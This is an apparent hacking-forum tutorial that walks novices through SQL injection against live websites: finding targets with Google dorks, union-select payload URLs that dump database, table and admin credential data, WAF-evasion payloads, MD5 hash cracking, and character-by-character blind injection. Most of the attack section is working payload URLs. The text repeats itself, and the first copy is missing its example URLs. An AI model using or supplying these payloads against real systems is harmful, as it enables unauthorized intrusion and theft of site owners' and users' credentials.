Hello Great JomGegar.com! As earlier promised, I am going to try and give an in-dept detailed and basic SQL Injection tutorial. I presume most of you are noobs to SQL Injection. So let's do a quick recap on what SQL Injection really is all about.
What Is an SQL Injection?
An SQL Injection is basically a code injection that exploits the area vulnerable to SQL Injection. The injected code will be exploiting the Database, to get Information. Such as Emails, Usernames, Passwords, etc. In this Tutorial, we'll be looking for the Admin Panel'scredentials.
Please note that I said 'Admin Panel', not 'control panel'. It is a well known fact that, while performing an SQL Injection, you may not always find what you're looking for. Some sites have secured the important information, so that it will not be compromised so easily.
Finding a Vulnerable Site:
The easiest way to find vulnerable sites is by using Dorks. Yes! Google is your best friend here, it's the best way. A dork looks something like this:
There are tons and tons of others Dorks so you will definitely find your pick if you want to find a good site to exploit with SQL Injection.
Exploiting the Database:
Ok. Here we go deeper into the fun world of an SQL Injection! First off, we need to test our site to see if it's vulnerable to SQL Injection. I will use a random site name (not real site pls n00bie) for my Example:
Please note that our site has to have an '=' in it. Otherwise we cannot use SQL Injection to exploit the Database. So after the 1 (In the ID) put a ' so that it looks like this:
If per chance we get a MySQL error, then our site is probably vulnerable. On the other hand, if it just refreshes the page normally, then our site is not vulnerable to injection.
Finding the number of columns:
Assuming our site is vulnerable to SQL Injection, we will go ahead and commence getting the Info out of the Database. However, before we can do that, we have to find out which columns are vulnerable to SQL Injection. So far we don't know how many columns there are yet, so we need to take care of that first.
In order to find the number of columns we need to use a command known as 'Order By'. This command will help us determine how many columns there are. So your URL should now look like this:
Right! So now, if the site just refreshed to it's normal state, that's good. So we didn't get an error, so we have to continue until we get an error.
http://www.hopefully.../event.php?id=1 order by 3--
*No Error*
http://www.hopefully.../event.php?id=1 order by 4--
*No Error*
http://www.hopefully.../event.php?id=1 order by 5--
*Error*
Okay, we got an error on column 5. That means there are only 4 columns. Since the 5th column doesn't exist, we got an error.
Important:
Please note that the two hyphen's (--) are critical for executing the command. The two hyphens will tell the site that it's a command, and will execute. So we need those at the end of every command.
Finding the vulnerable column:
Cool! So we now have the number of columns, then what? We just need to find out which one/s are vulnerable to the execution of SQL commands. So we will use a command called "union select". This is what will find the vulnerable column(s). So we need to add that command into our URL. After that command, we need to add the number of columns there are. So now our URL should look like this:
At this point a couple of numbers will appear on your screen. That is normal, and is a good sign. Those numbers, are the numbers of columns that are vulnerable to SQL Injection. So those are the columns we need to execute our commands in. Let's say that column 2 appeared on the page. We will be executing commands in column 2.
Important:
You HAVE to have the - after the =. That is extremely important.
Determining the Version of the MySQL Database:
I know. I know you may be wondering why the bloomingdales we need the version, right? Well it's simply because the version will let us know what commands we can use. I consider version 5 easier. So I will tell you how to get information from the Database with version 5.
Remember our vulnerable column is 2. In other words that's where we'll be executing the code. Replace the 2 with your command. The command is: @@version. So your URL should now look like this:
To which it should display the Version on the page, looking something like this:
Bang! The numbers don't matter though, as long as they're at least 5, or over.
Finding the name of the Database:
The Database name is very important to the attacker. At least if we want to look in the Tables which will contain the information. To find the name of the database, there are 2 most common ways. They both will work. The first command is:
Sometimes, that command will show you more than the Database name, but all we really want is the database name, so the better command would preferably be:
Voila! You now have the Database name. Bravo! See how far we made it. We are not n00bs anymore. Over to more excitement!
Viewing the Tables in the Database:
The tables are what contains information about the target site that's why we need to view them so we can get the information we seek.
The command to view the tables is longer than the few we've seen already. So here's what your URL should now look like:
Just hit 'enter' and the Tables in the Database will be displayed right before your eyes.
Viewing the Tables' information:
We will most likely be given many tables. It is up to you to decide which one contains the valuable information.So it can be at times difficult to choose a table that would contain important information. However, we will not always need the username, as it is most likely "admin". But the password, is what we REALLY need. So choose a table. The one I will use for this example will be "admin_credentials". It's very rare that you'll get a Table with a title basically making you choose that one. So this time use this query/command:
For that query, you will almost always get an error. So instead, convert the 'admin_credentials' to Hex.
To do that, I recommend this site:
http://www.swingnote...s/texttohex.php
Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this:
Important:
You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will not work.
Displaying the Contents:
There will still be some tables inside the Table you've chosen. So you need to get the information, and that will usually mean bye-byeTables, and Hello 'Admin Panel' access.
Let's say that mine is displaying "userpword" and "user". Those are the only columns that are displaying for me (However, this will very rarely be the case). So we need to access the information in there. We can access them both at a time actually. But if you prefer one at a time, use this query:
That will display the information. Where it says DBName, you need to put the name of the Database you got earlier in this tutorial. An where it says admin_credentials, you need to put the table that you are inside of.
Now we should have all the credentials, so we just need to find the Admin Login.
Finding the AdminLogin:
Usually, all you'll have to do is take a quick look by adding a small /admin or /index.php/admin.
Like this:
And there's plenty more. At times, you will not find the Login, so you'll need an "Admin Login" finder. There are some online, and there are also downloads. I recommend doing it manually, because it is more glorifying after hacking the Website.
WAF By-Passing:
You may be asking, what is WAF By-Passing? First off, I'll be explaining what WAF is.
WAF stands for Web Application Firewall. A Web Application Firewall is put in place, so that their website will be secure from attacks such as SQL Injection, XSS, and more exploitation methods. The WAF filters commands put through to the Database, and detects attakcs against the site.
A WAF Error will look like this:
If we get that error when we're using Union Select, that means that there is a WAF set in the webserver. So, in-order to by-pass it, we'll have to change our Syntax of the command, so that the filter doesn't detect an attack.
There are several methods on how to by-pass the WAF, I will be explaining a few:
(a) You don't have to worry about getting the number of columns, the Firewalls don't block that, however, the DO block the union select command, so here is method 1, on how to By-Pass the Firewall.
The code we're going to be using will be using different "Symbols" to by-pass the filter. It looks like this:
That will by-pass the Firewall. However, we still have several steps because we still need the other information from the tables and columns. Once that is done, we will be getting the information from the vulnerable columns, so here's what it should look like:
To make matters simple in this tutorial, we'll be grabbing more information with just one command. So let's try it like this:
Now, it should be displaying the information we asked for IN ORDER. So it'll be showing the Version, then the Username, then the Database name.
Now we'll be getting the table names. So we will again, have to by-pass the WAF. This time, the command will look like this:
Now, that will be displaying all the tables. Now that access the table's information, we're going to use this command to by-pass the firewall:
There we go! Now we're looking at the information of the tables. Now we want to dump the columns, so here's what we'll use:
That's all for WAF By-Passing. Hopefully now, you're an SQL Injection expert
. If you need any more help, feel free to PM me, or even add a comment. I really hope this helped, good luck!
Cracking Hashes:
What is a Hash you may be asking? A hash is basically an encrypted version of a Password, or any other "Hidden" information that can be used against the person, and/or site. People encrypt their passwords into a Hash, so that if there is a security breach, it will be hard to get the true password of the User, or Admin Panel.
There are many types of hashes, but the most popular to this day, is the MD5 hash. MD5 isn't an easy hash to decrypt, because you have to encrypt other passwords, and compare them to the Hash, there is no official way to decrypt them in any other way.
The best site you'll find on decrypting a Hash, would definitely be:
http://www.md5decrypter.co.uk/
But, if you've got some time on your hands, and if you would like a better decryption, I reccomend using Cain & Abel. You can perform a dictionary attack on a the MD5 encrypted Hash.
You'll need a wordlist.
This dictionary attack won't ALWAYS work, but most of the time it will. It all depends on the knowledge of the Webmaster. Some people use random strings of numerals and letters. Which in that case, you'd have to Bruteforce, which would be much more of a hassle.
There are plenty of Wordlists that you can find online. If you can't find any, PM me and I'll give you a link.
Manual SQL Injection: MYSQL
Blind injection is a little more complicated the classic injection but it can be done
Let's start with advanced stuff.
I will be using our example:
when we execute this, we see some page and articles on that page, pictures etc...then when we want to test it for blind sql injection attack:
and the page loads normally, that's ok. now the real test:
so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.
1) Get the MySQL version
to get the version in blind attack we use substring
i.e
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
2) Test if subselect works
when select don't work then we use subselect
i.e
If page loads normally then sub-selects work. Then we are going to see if we have access to mysql.user
i.e
If page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend
i.e.
(with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one
let's say that we have found that table name is users, now what we need is column name. the same as table name, we start guessing. Like i said before try the common names for columns.
i.e
if the page loads normally we know that column name is password (if we get false then try common names or just guess) here we merge 1 with the column password, then substring returns the first character (,1,1)
4). Pull data from database
we found table users i columns username password so we gonna pull characters from that.
ok this here pulls the first character from first user in table users. substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value and then compare it with simbol greater then >
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
we get TRUE, keep incrementing
TRUE again, higher!
so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'. then let's check the second character.
Note that I changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in length)
TRUE, the page loads normally, higher.
FALSE, lower number.
TRUE, higher.
FALSE!!! Bonza!!
we know that the second character is char(105) and that is 'i'. We have 'ci' so far, so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end). There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually, cause that makes you better SQL INJECTOR.
Just So You Know:
This tutorial took me a long time to write, and I really hope this will help people understand how to perform an SQL Injection.
SQL Injection IS ILLEGAL. So whatever you do with it, is your responsibilty, not mine. You can get in lots of trouble for an SQL Injection. Check out the Proxies and Socks section for protection while hacking a site.
Credit 2 Zer0Pwn 4 his thoughts on some of the segments.
Credit 2 Cold Maniac for Teaching me Blind Injection...
Long Live JomGegar.com....
What Is an SQL Injection?
An SQL Injection is basically a code injection that exploits the area vulnerable to SQL Injection. The injected code will be exploiting the Database, to get Information. Such as Emails, Usernames, Passwords, etc. In this Tutorial, we'll be looking for the Admin Panel'scredentials.
Please note that I said 'Admin Panel', not 'control panel'. It is a well known fact that, while performing an SQL Injection, you may not always find what you're looking for. Some sites have secured the important information, so that it will not be compromised so easily.
Finding a Vulnerable Site:
The easiest way to find vulnerable sites is by using Dorks. Yes! Google is your best friend here, it's the best way. A dork looks something like this:
inurl:news.php?id= inurl:event.php?id= inurl:order.php?id= inurl:user.php?id= inurl:restaurant.php?id= inurl:buy.php?id=
There are tons and tons of others Dorks so you will definitely find your pick if you want to find a good site to exploit with SQL Injection.
Exploiting the Database:
Ok. Here we go deeper into the fun world of an SQL Injection! First off, we need to test our site to see if it's vulnerable to SQL Injection. I will use a random site name (not real site pls n00bie) for my Example:
http://www.couldbevulnerablesite.com/event.php?id=1
Please note that our site has to have an '=' in it. Otherwise we cannot use SQL Injection to exploit the Database. So after the 1 (In the ID) put a ' so that it looks like this:
http://www.couldbevulnerablesite.com/event.php?id=1'
If per chance we get a MySQL error, then our site is probably vulnerable. On the other hand, if it just refreshes the page normally, then our site is not vulnerable to injection.
Finding the number of columns:
Assuming our site is vulnerable to SQL Injection, we will go ahead and commence getting the Info out of the Database. However, before we can do that, we have to find out which columns are vulnerable to SQL Injection. So far we don't know how many columns there are yet, so we need to take care of that first.
In order to find the number of columns we need to use a command known as 'Order By'. This command will help us determine how many columns there are. So your URL should now look like this:
http://www.couldbevulnerablesite.com/event.php?id=1 order by 2--
Right! So now, if the site just refreshed to it's normal state, that's good. So we didn't get an error, so we have to continue until we get an error.
http://www.hopefully.../event.php?id=1 order by 3--
*No Error*
http://www.hopefully.../event.php?id=1 order by 4--
*No Error*
http://www.hopefully.../event.php?id=1 order by 5--
*Error*
Okay, we got an error on column 5. That means there are only 4 columns. Since the 5th column doesn't exist, we got an error.
Important:
Please note that the two hyphen's (--) are critical for executing the command. The two hyphens will tell the site that it's a command, and will execute. So we need those at the end of every command.
Finding the vulnerable column:
Cool! So we now have the number of columns, then what? We just need to find out which one/s are vulnerable to the execution of SQL commands. So we will use a command called "union select". This is what will find the vulnerable column(s). So we need to add that command into our URL. After that command, we need to add the number of columns there are. So now our URL should look like this:
http://www.couldbevulnerablesite.com/event.php?id=-1 union select 1,2,3,4--
At this point a couple of numbers will appear on your screen. That is normal, and is a good sign. Those numbers, are the numbers of columns that are vulnerable to SQL Injection. So those are the columns we need to execute our commands in. Let's say that column 2 appeared on the page. We will be executing commands in column 2.
Important:
You HAVE to have the - after the =. That is extremely important.
Determining the Version of the MySQL Database:
I know. I know you may be wondering why the bloomingdales we need the version, right? Well it's simply because the version will let us know what commands we can use. I consider version 5 easier. So I will tell you how to get information from the Database with version 5.
Remember our vulnerable column is 2. In other words that's where we'll be executing the code. Replace the 2 with your command. The command is: @@version. So your URL should now look like this:
http://www.couldbevulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--
To which it should display the Version on the page, looking something like this:
5.1.47-community-log
Bang! The numbers don't matter though, as long as they're at least 5, or over.
Finding the name of the Database:
The Database name is very important to the attacker. At least if we want to look in the Tables which will contain the information. To find the name of the database, there are 2 most common ways. They both will work. The first command is:
http://couldbevulnerablesite/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--
Sometimes, that command will show you more than the Database name, but all we really want is the database name, so the better command would preferably be:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--
Voila! You now have the Database name. Bravo! See how far we made it. We are not n00bs anymore. Over to more excitement!
Viewing the Tables in the Database:
The tables are what contains information about the target site that's why we need to view them so we can get the information we seek.
The command to view the tables is longer than the few we've seen already. So here's what your URL should now look like:
http://www.couldbevulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--
Just hit 'enter' and the Tables in the Database will be displayed right before your eyes.
Viewing the Tables' information:
We will most likely be given many tables. It is up to you to decide which one contains the valuable information.So it can be at times difficult to choose a table that would contain important information. However, we will not always need the username, as it is most likely "admin". But the password, is what we REALLY need. So choose a table. The one I will use for this example will be "admin_credentials". It's very rare that you'll get a Table with a title basically making you choose that one. So this time use this query/command:
http://www.couldbevulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"
For that query, you will almost always get an error. So instead, convert the 'admin_credentials' to Hex.
To do that, I recommend this site:
http://www.swingnote...s/texttohex.php
Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this:
http://www.couldbevulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73
Important:
You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will not work.
Displaying the Contents:
There will still be some tables inside the Table you've chosen. So you need to get the information, and that will usually mean bye-byeTables, and Hello 'Admin Panel' access.
Let's say that mine is displaying "userpword" and "user". Those are the only columns that are displaying for me (However, this will very rarely be the case). So we need to access the information in there. We can access them both at a time actually. But if you prefer one at a time, use this query:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(userpword),3,4 FROM DBName.admin_credentials--
That will display the information. Where it says DBName, you need to put the name of the Database you got earlier in this tutorial. An where it says admin_credentials, you need to put the table that you are inside of.
Now we should have all the credentials, so we just need to find the Admin Login.
Finding the AdminLogin:
Usually, all you'll have to do is take a quick look by adding a small /admin or /index.php/admin.
Like this:
http://www.couldbevulnerablesite.com/admin http://www.couldbevulnerablesite.com/admin.php http://www.couldbevulnerablesite.com/login.php http://www.couldbevulnerablesite.com/admin/index.php http://www.couldbevulnerablesite.com/login/index.php http://www.couldbevulnerablesite.com/adminlogin http://www.couldbevulnerablesite.com/adminlogin.php http://www.couldbevulnerablesite.com/adminlogin/index.php http://www.couldbevulnerablesite.com/moderator.php http://www.couldbevulnerablesite.com/moderator http://www.couldbevulnerablesite.com/modlogin
And there's plenty more. At times, you will not find the Login, so you'll need an "Admin Login" finder. There are some online, and there are also downloads. I recommend doing it manually, because it is more glorifying after hacking the Website.
WAF By-Passing:
You may be asking, what is WAF By-Passing? First off, I'll be explaining what WAF is.
WAF stands for Web Application Firewall. A Web Application Firewall is put in place, so that their website will be secure from attacks such as SQL Injection, XSS, and more exploitation methods. The WAF filters commands put through to the Database, and detects attakcs against the site.
A WAF Error will look like this:
FORBIDDEN You are not allowed to access "" on this server *INFORMATION ABOUT THE WEBSERVER IS HERE*
If we get that error when we're using Union Select, that means that there is a WAF set in the webserver. So, in-order to by-pass it, we'll have to change our Syntax of the command, so that the filter doesn't detect an attack.
There are several methods on how to by-pass the WAF, I will be explaining a few:
(a) You don't have to worry about getting the number of columns, the Firewalls don't block that, however, the DO block the union select command, so here is method 1, on how to By-Pass the Firewall.
The code we're going to be using will be using different "Symbols" to by-pass the filter. It looks like this:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--
That will by-pass the Firewall. However, we still have several steps because we still need the other information from the tables and columns. Once that is done, we will be getting the information from the vulnerable columns, so here's what it should look like:
http://www.hopefullyvulnerablesite.com/event.phpid=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version()),3--
To make matters simple in this tutorial, we'll be grabbing more information with just one command. So let's try it like this:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version(),0x3a,user(),0x3a,database(),0x3a),3--
Now, it should be displaying the information we asked for IN ORDER. So it'll be showing the Version, then the Username, then the Database name.
Now we'll be getting the table names. So we will again, have to by-pass the WAF. This time, the command will look like this:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(table_name),3 from /*!information_schema*/.tables where table_schema=database()--
Now, that will be displaying all the tables. Now that access the table's information, we're going to use this command to by-pass the firewall:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(column_name),3 from /*!information_schema*/.columns where table_name=0x*HEX CODE OF THE TABLE NAME*--
There we go! Now we're looking at the information of the tables. Now we want to dump the columns, so here's what we'll use:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(*COLUMN NAME HERE*),3 from *DATABASE NAME HERE*.*TABLE NAME HERE*
That's all for WAF By-Passing. Hopefully now, you're an SQL Injection expert
. If you need any more help, feel free to PM me, or even add a comment. I really hope this helped, good luck!Cracking Hashes:
What is a Hash you may be asking? A hash is basically an encrypted version of a Password, or any other "Hidden" information that can be used against the person, and/or site. People encrypt their passwords into a Hash, so that if there is a security breach, it will be hard to get the true password of the User, or Admin Panel.
There are many types of hashes, but the most popular to this day, is the MD5 hash. MD5 isn't an easy hash to decrypt, because you have to encrypt other passwords, and compare them to the Hash, there is no official way to decrypt them in any other way.
The best site you'll find on decrypting a Hash, would definitely be:
http://www.md5decrypter.co.uk/
But, if you've got some time on your hands, and if you would like a better decryption, I reccomend using Cain & Abel. You can perform a dictionary attack on a the MD5 encrypted Hash.
You'll need a wordlist.
This dictionary attack won't ALWAYS work, but most of the time it will. It all depends on the knowledge of the Webmaster. Some people use random strings of numerals and letters. Which in that case, you'd have to Bruteforce, which would be much more of a hassle.
There are plenty of Wordlists that you can find online. If you can't find any, PM me and I'll give you a link.
Manual SQL Injection: MYSQL
Blind injection is a little more complicated the classic injection but it can be done
Let's start with advanced stuff.I will be using our example:
http://www.site.com/news.php?id=5
when we execute this, we see some page and articles on that page, pictures etc...then when we want to test it for blind sql injection attack:
http://www.site.com/news.php?id=5 and 1=1 <--- this is always true
and the page loads normally, that's ok. now the real test:
http://www.site.com/news.php?id=5 and 1=2 <--- this is false
so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.
1) Get the MySQL version
to get the version in blind attack we use substring
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
2) Test if subselect works
when select don't work then we use subselect
i.e
http://www.site.com/news.php?id=5 and (select 1)=1
If page loads normally then sub-selects work. Then we are going to see if we have access to mysql.user
i.e
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
If page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one
let's say that we have found that table name is users, now what we need is column name. the same as table name, we start guessing. Like i said before try the common names for columns.
i.e
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get false then try common names or just guess) here we merge 1 with the column password, then substring returns the first character (,1,1)
4). Pull data from database
we found table users i columns username password so we gonna pull characters from that.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users. substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value and then compare it with simbol greater then >
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher!
so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'. then let's check the second character.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
Note that I changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in length)
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!! Bonza!!
we know that the second character is char(105) and that is 'i'. We have 'ci' so far, so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end). There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually, cause that makes you better SQL INJECTOR
.Just So You Know:
This tutorial took me a long time to write, and I really hope this will help people understand how to perform an SQL Injection.
SQL Injection IS ILLEGAL. So whatever you do with it, is your responsibilty, not mine. You can get in lots of trouble for an SQL Injection. Check out the Proxies and Socks section for protection while hacking a site.
Credit 2 Zer0Pwn 4 his thoughts on some of the segments.
Credit 2 Cold Maniac for Teaching me Blind Injection...
Long Live JomGegar.com....
